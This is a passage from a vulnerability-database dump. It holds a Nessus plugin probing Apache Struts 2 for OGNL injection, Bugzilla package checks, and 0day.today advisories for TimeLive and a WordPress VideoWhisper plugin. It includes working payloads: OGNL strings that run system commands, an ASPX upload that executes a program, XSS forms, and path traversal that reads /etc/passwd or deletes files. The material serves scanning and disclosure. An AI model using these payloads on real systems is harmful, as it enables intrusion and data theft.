Page from Tomcat/JBoss\n# This attack uses the redirect: Parameter\nif (!vuln)\n{\n time = unixtime();\n foreach url (urls)\n {\n vuln_url = url +\"?redirect:${%23req%3d%23context.get('com.opensymphony\" +\n \".xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.get\" +\n \"Session().getServletContext().getRealPath('/'),%23resp%3d%23context.\" +\n \"get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').\" +\n \"getWriter(),%23resp.print('At%20\" +time+ \"%20Nessus%20found%20the\" +\n \"%20path%20is%20'),%23resp.println(%23webroot),%23resp.flush(),\" +\n \"%23resp.close()}\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n exit_on_fail : TRUE\n );\n\n if (\n (res[0] =~ \"200 OK\") &&\n (res[2] =~ '^At '+time+' Nessus found the path is ([a-zA-Z]:\\\\\\\\|/)(.*)')\n )\n {\n vuln = TRUE;\n break;\n }\n if (vuln) break;\n }\n}\n\n# try pingback.\nif(!vuln)\n{\n\n scanner_ip = this_host();\n target_ip = get_host_ip();\n\n ua = get_kb_item(\"global_settings/http_user_agent\");\n if (empty_or_null(ua))\n ua = 'Nessus';\n\n pat = hexstr(rand_str(length:10));\n\n if (!empty_or_null(os) && \"windows\" >< tolower(os))\n {\n ping_cmd = \"ping%20-n%203%20-l%20500%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n }\n else\n {\n ping_cmd = \"ping%20-c%203%20-p\" + pat + \"%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n }\n\n payload_ping = \"?redirect:$%7b%23context%5b%27xwork.MethodAccessor.denyMethodExecution\" +\n \"%27%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28\" +\n \"%27allowStaticMethodAccess%27%29%2c%23f.setAccessible%28true%29%2c%23f.set%28\" +\n \"%23_memberAccess%2ctrue%29%2c@org.apache.commons.io.IOUtils@toString%28\" +\n \"@java.lang.Runtime@getRuntime%28%29.exec%28%27\" + ping_cmd + \n \"%27%29.getInputStream%28%29%29%7d\";\n\n foreach url (urls)\n {\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = url + payload_ping;\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n break;\n }\n }\n}\n\n# and finally, we try a simple injection of an ognl add.\nif(!vuln)\n{\n foreach url (urls)\n { \n payload_ognl_add = \"?redirect:%24%7B57550614%2b16044095%7D\";\n payload_redirect_verify_regex = \"Location: .*73594709\";\n \n attack_url = url + payload_ognl_add;\n\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE,\n follow_redirect: 0\n );\n\n if (res[1] =~ payload_redirect_verify_regex)\n {\n vuln = TRUE;\n vuln_url = attack_url;\n break;\n }\n\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n }\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(res[2])\n);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:18:20", "bulletinFamily": "scanner", "description": "Previous versions of bugzilla had the following security issues :\n\n - The login form had no CSRF protection, meaning that an\n attacker could force the victim to log in using the\n attacker's credentials.\n\n - Dangerous control characters can be inserted into\n Bugzilla, notably into bug comments, which can then be\n used to execute local commands.\n\nThe first issue has the CVE number CVE-2014-1517. Please see\nhttp://www.bugzilla.org/security/4.0.11/ for all the gory details.\n\nBoth issues were fixed in 4.2.8 but it introduced a regression in bug\ncommenting that was fixed in 4.2.9.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2018-12-05T00:00:00", "published": "2014-04-30T00:00:00", "id": "FEDORA_2014-5433.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73778", "title": "Fedora 20 : bugzilla-4.2.9-1.fc20 (2014-5433)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5433.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73778);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2014-1517\");\n script_bugtraq_id(66984);\n script_xref(name:\"FEDORA\", value:\"2014-5433\");\n\n script_name(english:\"Fedora 20 : bugzilla-4.2.9-1.fc20 (2014-5433)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Previous versions of bugzilla had the following security issues :\n\n - The login form had no CSRF protection, meaning that an\n attacker could force the victim to log in using the\n attacker's credentials.\n\n - Dangerous control characters can be inserted into\n Bugzilla, notably into bug comments, which can then be\n used to execute local commands.\n\nThe first issue has the CVE number CVE-2014-1517. Please see\nhttp://www.bugzilla.org/security/4.0.11/ for all the gory details.\n\nBoth issues were fixed in 4.2.8 but it introduced a regression in bug\ncommenting that was fixed in 4.2.9.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.bugzilla.org/security/4.0.11/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.bugzilla.org/security/4.0.11/\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132309.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b6e314a9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bugzilla package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"bugzilla-4.2.9-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bugzilla\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:18:18", "bulletinFamily": "scanner", "description": "A Bugzilla Security Advisory reports : The login form had no CSRF\nprotection, meaning that an attacker could force the victim to log in\nusing the attacker's credentials. If the victim then reports a new\nsecurity sensitive bug, the attacker would get immediate access to\nthis bug.\n\nDue to changes involved in the Bugzilla API, this fix is not\nbackported to the 4.0 and 4.2 branches, meaning that Bugzilla 4.0.12\nand older, and 4.2.8 and older, will remain vulnerable to this issue.", "modified": "2018-11-10T00:00:00", "published": "2014-04-21T00:00:00", "id": "FREEBSD_PKG_608ED765C70011E3848C20CF30E32F6D.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73632", "title": "FreeBSD : bugzilla -- Cross-Site Request Forgery (608ed765-c700-11e3-848c-20cf30e32f6d)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73632);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:49:43\");\n\n script_cve_id(\"CVE-2014-1517\");\n\n script_name(english:\"FreeBSD : bugzilla -- Cross-Site Request Forgery (608ed765-c700-11e3-848c-20cf30e32f6d)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A Bugzilla Security Advisory reports : The login form had no CSRF\nprotection, meaning that an attacker could force the victim to log in\nusing the attacker's credentials. If the victim then reports a new\nsecurity sensitive bug, the attacker would get immediate access to\nthis bug.\n\nDue to changes involved in the Bugzilla API, this fix is not\nbackported to the 4.0 and 4.2 branches, meaning that Bugzilla 4.0.12\nand older, and 4.2.8 and older, will remain vulnerable to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=713926\"\n );\n # https://vuxml.freebsd.org/freebsd/608ed765-c700-11e3-848c-20cf30e32f6d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ebfa9293\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bugzilla40\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bugzilla42\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bugzilla44\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"bugzilla40>=2.0.0<4.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bugzilla42>=2.0.0<4.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bugzilla44>=2.0.0<4.4.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-01-24T19:20:15", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2014-04-24T00:00:00", "published": "2014-04-24T00:00:00", "id": "1337DAY-ID-22178", "href": "https://0day.today/exploit/description/22178", "type": "zdt", "title": "Livetecs Timelive 6.2.71 Unauthenticated Access / File Upload Vulnerabilities", "sourceData": "Vulnerability title: Unauthenticated access to sensitive information and\r\nfunctionality in Livetecs Timelive\r\nCVE: CVE-2014-1217\r\nVendor: Livetecs\r\nProduct: Timelive\r\nAffected version: 6.2.71\r\nFixed version: 6.2.8\r\nReported by: Richard Hatch\r\n\r\nDetails:\r\nIt was possible to access a URL that allowed unauthenticated access\r\nto sensitive configuration change functionality, and also revealed the\r\ndatabase connection\r\nstring (including authentication credentials) used by TimeLive to access\r\nthe database.\r\n\r\nThe following URL was identified:\r\nhttp://MyTimeLiveServer/home/systemsetting.aspx\r\n\r\nNote: This URL was identified by entering \"timelive default credentials\"\r\ninto the Google\r\nInternet search engine. At time of writing the URL was revealed by the\r\nfirst result returned\r\nby Google.\r\n\r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1217/\r\n\r\nVulnerability title: Unrestricted file upload in Livetecs Timelive\r\nCVE: CVE-2014-2042\r\nVendor: Livetecs\r\nProduct: Timelive\r\nAffected version: 6.2.71\r\nFixed version: 6.5.1\r\nReported by: Richard Hatch\r\n\r\nDetails:\r\nIt was discovered that it was possible for low-level TimeLive\r\napplication users to upload\r\nfiles (by using the \"My Projects\"..\"Manage Project\" functionality).\r\nThere was no restriction on\r\nfile types that could be uploaded and the permissions applied to those\r\nuploaded files included\r\n\"Read and Execute\".\r\n\r\n1. Using any text editor create a new file \"run-cacl.aspx\" and add the\r\nfollowing content:\r\n\r\n<%@ Page Language=\"VB\" %>\r\n <%\r\n System.Diagnostics.Process.Start(\"calc.exe\")\r\n %>\r\n\r\n2. Login to the TimeLive application as a low-level (standard) user\r\n3. Click \"My Projects\" from the left-hand menu\r\n4. Click the \"Manage\" icon - It looks like a notepad and pen\r\n5. Scroll to the bottom of the page that opens and click \"Attachment\"\r\n6. Click \"Browse\" and navigate to to where you saved \"run-cacl.exe\"\r\n7. Click \"Upload\"\r\n8. Logout of TimeLive [Optional]\r\n9. On the server hosting the TimeLive application run \"TaskMgr\"\r\n9. Browse to http://MyTimeLiveURL/Uploads/1/1/run-cacl.aspx\r\n10. Observe \"calc.exe\" running as \"NETWORK_SERVICE\" in the Task manager\r\nNote: Depending on the configuration of the TimeLive application used\r\nfor testing it may be\r\nnecessary to change the \"1/1\" part of the URL.\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2042/\n\n# 0day.today [2018-01-24] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22178"}, {"lastseen": "2018-03-28T03:18:48", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2014-02-28T00:00:00", "published": "2014-02-28T00:00:00", "id": "1337DAY-ID-21955", "href": "https://0day.today/exploit/description/21955", "type": "zdt", "title": "Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities", "sourceData": "Product: VideoWhisper Live Streaming Integration\r\nVendor: VideoWhisper\r\nVulnerable Version(s): 4.27.3 and probably prior\r\nTested Version: 4.27.3\r\nAdvisory Publication: February 6, 2014 [without technical details]\r\nVendor Notification: February 6, 2014\r\nVendor Patch: February 7, 2014\r\nPublic Disclosure: February 27, 2014\r\nVulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211]\r\nCVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908\r\nRisk Level: Critical\r\nCVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n \r\n------------------------------------------------------------------------\r\n-----------------------\r\n \r\nAdvisory Details:\r\n \r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files.\r\n \r\n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905\r\n \r\nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snaps\r\nhots.php\". A remote attacker can upload and execute arbitrary PHP file on the target system.\r\n \r\nThe following PoC code demonstrates exploitation of the vulnerability:\r\n \r\nAfter successful exploitation the remote shell will be accessible via the following URL:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/snapshots/1.php.jpg\r\n \r\nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension.\r\n \r\n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906\r\n \r\n2.1 The vulnerability exists due to insufficient filtration of \"m\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu\r\ns.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled plugin\u00e2??s widget. The script will be also executed in administrative section on the following page:\r\n \r\nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.p\r\nhp&tab=live\r\n \r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/lb_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"u\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"m\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n \r\n2.2 The vulnerability exists due to insufficient filtration of \"msg\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatl\r\nog.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page.\r\n \r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/vc_chatlog.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"msg\" value=\"<script>alert('immuniweb')</script>\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n</form>\r\n</body>\r\n \r\nThe code will be executed when the user visits the following URL:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/uploads/[room]/Log[date].html\r\n \r\nWhere [room] is set by HTTP POST parameter r and [date] is the current date.\r\n \r\n2.3 The vulnerabilities exist due to insufficient filtration of \"n\" HTTP GET parameter passed to scripts \"channel.php\", \"htmlchat.php\", \"video.php\" and \"videotext.php\" within the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/\" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n \r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3\r\nE\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%\r\n3E\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/sc\r\nript%3E\r\n \r\n2.4 The vulnerability exists due to insufficient filtration of \"message\" HTTP GET parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logou\r\nt.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n \r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/\r\nscript%3E\r\n \r\n2.5 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu\r\ns.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n \r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/lb_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n \r\n2.6 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status\r\n.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n \r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n \r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/v_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n \r\n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907\r\n \r\n3.1 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nin.php\" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences.\r\n \r\nThe exploitation example below displays contents of \"/etc/passwd\" file:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp_login.php?s=../../../../../../etc/passwd\r\n \r\n3.2 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nout.php\" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences.\r\n \r\nThe exploitation example below deletes a file \"/tmp/immuniweb\":\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb\r\n \r\nSuccessful exploitation of this vulnerability requires that file \"/tmp/immuniweb\" exists on the system.\r\n \r\n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908\r\n \r\n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application.\r\n \r\nThe following URL can be used to gain knowledge of full installation path of the application:\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/bp.php\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/videowhisper_streaming.php\r\n \r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp.inc.php\r\n \r\n------------------------------------------------------------------------\r\n-----------------------\r\n \r\nSolution:\r\n \r\nUpdate to VideoWhisper Live Streaming Integration version 4.29.5\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21955"}, {"lastseen": "2018-01-10T01:12:35", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2014-04-04T00:00:00", "published": "2014-04-04T00:00:00", "id": "1337DAY-ID-22100", "href": "https://0day.today/exploit/description/22100", "type": "zdt", "title": "Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability", "sourceData": "Product: XCloner Wordpress plugin\r\nVendor: XCloner\r\nVulnerable Version(s): 3.1.0 and probably prior\r\nTested Version: 3.1.0\r\nAdvisory Publication: March 12, 2014 [without technical details]\r\nVendor Notification: March 12, 2014\r\nVendor Patch: March 13, 2014\r\nPublic Disclosure: April 2, 2014\r\nVulnerability Type: Cross-Site Request Forgery [CWE-352]\r\nCVE Reference: CVE-2014-2340\r\nRisk Level: Low\r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research 